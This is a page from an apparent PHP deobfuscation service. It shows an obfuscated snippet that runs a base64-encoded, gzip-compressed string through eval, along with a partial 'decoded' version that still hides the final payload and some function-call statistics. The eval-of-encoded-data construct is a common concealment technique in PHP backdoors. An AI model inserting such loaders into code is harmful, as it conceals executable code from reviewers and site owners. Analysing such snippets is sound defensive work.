Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

$stt1 = "Sy1LzNFQt7dT10uvKs1Lzs8tKEotLtZIr8rMS8tJLEnVSEosTjUziU9JT\x635PSdUoLikqSi3TU\x43k..

Decoded Output download

<?  $stt1 = "Sy1LzNFQt7dT10uvKs1Lzs8tKEotLtZIr8rMS8tJLEnVSEosTjUziU9JTc5PSdUoLikqSi3TUCkuKTHQBAFrAA=="; 
eval(htmlspecialchars_decode(gzinflate(base64_decode($stt1)))); 
 ?>

Did this file decode correctly?

Original Code

$stt1 = "Sy1LzNFQt7dT10uvKs1Lzs8tKEotLtZIr8rMS8tJLEnVSEosTjUziU9JT\x635PSdUoLikqSi3TU\x43kuKTHQ\x42\x41Fr\x41\x41\x3d\x3d";
eval(htmlspecialchars_decode(gzinflate(base64_decode($stt1))));

Function Calls

gzinflate 1
base64_decode 1
htmlspecialchars_decode 1

Variables

$stt1 Sy1LzNFQt7dT10uvKs1Lzs8tKEotLtZIr8rMS8tJLEnVSEosTjUziU9JTc5P..

Stats

MD5 028928ec49f91b8511f5f8bfc7321ef4
Eval Count 0
Decode Time 58 ms